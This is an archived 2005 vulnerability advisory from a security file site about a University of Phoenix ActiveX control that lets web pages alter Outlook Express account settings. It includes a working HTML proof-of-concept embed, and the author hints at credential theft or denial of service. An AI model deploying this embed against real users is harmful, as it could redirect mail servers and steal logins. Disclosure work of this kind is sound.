what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

uofpConfig.txt

uofpConfig.txt
Posted Feb 1, 2005
Authored by Adam Baldwin | Site evilpacket.net

An active-x control used to set up e-mail, nntp, and ldap accounts in Outlook Express for the University of Phoenix allows for later account manipulation.

tags | exploit, activex
SHA-256 | 4bca6a33736e5903a701811c2b98fceeb18af1da5f873243b6df0556d9db116d

uofpConfig.txt

Change Mirror Download
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

University of Phoenix Outlook Express Unauthorized Configuration Manipulation
Vendor Homepage: http://www.phoenix.edu

Discovered by: Adam Baldwin (evilpacket@ngenuity-is.com)
www.evilpacket.net\advisories\EP-000-0002.html

Discovery Date: 1.17.2005

File Name: PhxStudent15.ocx
Vulnerable Version: 2.00.0001

Overview:
PhxStudent15.ocx is an activex control used to setup e-mail / NNTP and
LDAP accounts in Outlook Express. This control remains on the users
system long after the setup process has completed. This activex
control can be used to manipulate the users account settings (imap /
smtp / nntp / ldap).

The following is an example of how to embed this control into a
website with the proper param's. Note the account is only 'modified'
if the "Program" param remains the same, which is not difficult. Any
of the other settings can be modified to cause any number of attacks
from denial of service to theft of login credentials, (be inventive
:-)

Example:
<HTML>
<BODY>
<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4
codeBase="PhxStudent15.ocx">
<PARAM NAME="Program" VALUE="BSIT">
<PARAM NAME="GroupID" VALUE="BSAF008HU0">
<PARAM NAME="CourseID" VALUE="DBM/380">
<PARAM NAME="StartDate" VALUE="01/20/2005">
<PARAM NAME="Path" VALUE="">
<PARAM NAME="DNS" VALUE="bsit2.phoenix.edu">
<PARAM NAME="Student" VALUE="Y">
<PARAM NAME="FName" VALUE="FIRSTNAME">
<PARAM NAME="LName" VALUE="LASTNAME">
<PARAM NAME="Alias" VALUE="username">
<PARAM NAME="ErrorPath" VALUE="">
<PARAM NAME="CourseListPage" VALUE="">
<PARAM NAME="Account2000YN" VALUE="Y">
<PARAM NAME="NNTPUserNamePrefix" VALUE="ols\">
<PARAM NAME="EmailSuffix" VALUE="@email.uophx.edu">
<PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">
<PARAM NAME="MailoutLocation" VALUE="emailout.phoenix.edu">
<PARAM NAME="EmailLocation" VALUE="email11.phoenix.edu">
<PARAM NAME="FlexnetEmailLocation" VALUE="email11.phoenix.edu">
<PARAM NAME="LDAPUserName" VALUE="">
<PARAM NAME="ProgramSuffix" VALUE="_">
</OBJECT>
</BODY>
</HTML>

Mitigation:
The University of Phoenix has been contacted but no response has been
received. I would recommend that students remove this activex control
and only allow it to be installed while registering for classes.

Notes:
At this time further exploitation does not appear possible, although
on the following platform (with modification of the params) would
crash IE after the ocx was loaded and crashed 3 times in the same
browser window, which begs further research.

Platform: Windows XP SP2, IE 6.0.2900.2180.xpsp2_rtm.040803-2158

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close